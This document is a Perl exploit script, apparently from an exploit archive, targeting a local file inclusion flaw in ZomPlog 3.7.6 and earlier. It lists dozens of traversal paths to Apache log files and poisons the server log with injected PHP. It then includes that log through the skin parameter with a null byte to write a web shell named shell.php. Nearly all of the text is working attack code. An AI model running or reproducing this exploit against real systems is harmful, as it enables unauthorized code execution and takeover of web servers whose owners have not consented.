ZomPlog <= 3.7.6 Local File Inclusion Vulnerabilty (win32)

#Made&nbsp;by&nbsp;Bl0od3r #tech-bl0od3r.blogspot.com use&nbsp;IO::Socket; use&nbsp;Switch; { $port&nbsp;=&nbsp;\"80\";&nbsp;# $target&nbsp;=&nbsp;@ARGV[0];&nbsp;#&nbsp; $folder&nbsp;=&nbsp;@ARGV[1];&nbsp;#&nbsp; @paths=( \"../../../../../var/log/httpd/access_log\", \"../../../../../var/log/httpd/error_log\", \"../apache/logs/error.log\", \"../apache/logs/access.log\", \"../../apache/logs/error.log\", \"../../apache/logs/access.log\", \"../../../apache/logs/error.log\", \"../../../apache/logs/access.log\", \"../../../../apache/logs/error.log\", \"../../../../apache/logs/access.log\", \"../../../../../apache/logs/error.log\", \"../../../../../apache/logs/access.log\", \"../logs/error.log\", \"../logs/access.log\", \"../../logs/error.log\", \"../../logs/access.log\", \"../../../logs/error.log\", \"../../../logs/access.log\", \"../../../../logs/error.log\", \"../../../../logs/access.log\", \"../../../../../logs/error.log\", \"../../../../../logs/access.log\", \"../../../../../etc/httpd/logs/access_log\", \"../../../../../etc/httpd/logs/access.log\", \"../../../../../etc/httpd/logs/error_log\", \"../../../../../etc/httpd/logs/error.log\", \"../../../../../var/www/logs/access_log\", \"../../../../../var/www/logs/access.log\", \"../../../../../usr/local/apache/logs/access_log\", \"../../../../../usr/local/apache/logs/access.log\", \"../../../../../var/log/apache/access_log\", \"../../../../../var/log/apache/access.log\", \"../../../../../var/log/access_log\", \"../../../../../var/www/logs/error_log\", \"../../../../../var/www/logs/error.log\", \"../../../../../usr/local/apache/logs/error_log\", \"../../../../../usr/local/apache/logs/error.log\", \"../../../../../var/log/apache/error_log\", \"../../../../../var/log/apache/error.log\", \"../../../../../var/log/access_log\", \"../../../../../var/log/error_log\", \"../../../apache/logs/access.log\" ); $sack_bad=IO::Socket::INET->new(Proto=>\"tcp\",PeerAddr=>$target,PeerPort=>$port)&nbsp;||&nbsp;die&nbsp;\"[Error&nbsp;while&nbsp;connecting] \"; print&nbsp;$sack_bad&nbsp;\"GET&nbsp;/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&nbsp;HTTP/1.1 \"; print&nbsp;$sack_bad&nbsp;\"Host:&nbsp;$target \"; print&nbsp;$sack_bad&nbsp;\"Connection:&nbsp;close \"; close($sack_bad); ################################################################################################################################### $sack_good=IO::Socket::INET->new(Proto=>\"tcp\",PeerAddr=>$target,PeerPort=>$port)&nbsp;||&nbsp;die&nbsp;\"[Error&nbsp;while&nbsp;connecting] \"; print&nbsp;$sack_good&nbsp;\"GET&nbsp;/index.php?&AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&nbsp;HTTP/1.1 \"; print&nbsp;$sack_good&nbsp;\"Host:&nbsp;$target \"; print&nbsp;$sack_good&nbsp;\"Connection:&nbsp;close \"; close($sack_good); ################################################################################################################################### print&nbsp;\"[+]Fake&nbsp;paths&nbsp;created. \"; foreach&nbsp;$path&nbsp;(@paths) { &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$sock&nbsp;=&nbsp;IO::Socket::INET->new(Proto&nbsp;=>&nbsp;\"tcp\",&nbsp;PeerAddr&nbsp;=>&nbsp;$target,&nbsp;PeerPort&nbsp;=>&nbsp;$port)&nbsp;||&nbsp;die&nbsp;\"[Error&nbsp;while&nbsp;connecting] \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;$sock&nbsp;\"GET&nbsp;\".$folder.\"themes/default/?theme[options]=232222&settings[skin]=\".$path.\"%00&nbsp;HTTP/1.1 \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;$sock&nbsp;\"Host:&nbsp;$target \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;$sock&nbsp;\"Accept:&nbsp;text/html \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;print&nbsp;$sock&nbsp;\"Connection:&nbsp;close \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;($answer&nbsp;=&nbsp;<$sock>)&nbsp;{ $out.=$answer; &nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($out&nbsp;=~&nbsp;m/AAAAAAAAAAAAAAAAAAAAAAAAAAA/)&nbsp;{ print&nbsp;\"Found->[\".$path.\"]\"; &code(); } } sub&nbsp;code()&nbsp;{ $code_sock=IO::Socket::INET->new(Proto=>\"tcp\",PeerAddr=>$target,PeerPort=>$port)&nbsp;||&nbsp;die&nbsp;\"[Error&nbsp;while&nbsp;connecting] \"; print&nbsp;$code_sock&nbsp;\"GET&nbsp;/<?php&nbsp;$file=fopen(\'shell.php\',\'w\');fwrite($file,\'<?php&nbsp;include($_GET[file])&nbsp;?>\');&nbsp;?>&nbsp;HTTP/1.1 \"; print&nbsp;$code_sock&nbsp;\"Host:&nbsp;$target \"; print&nbsp;$code_sock&nbsp;\"Connection:&nbsp;close \"; print&nbsp;\" [+]Bad&nbsp;Code&nbsp;Injected \"; &cmd(); } sub&nbsp;cmd()&nbsp;{ print&nbsp;\"[+]Successfully&nbsp;created:shell.php \"; exit; } } &nbsp;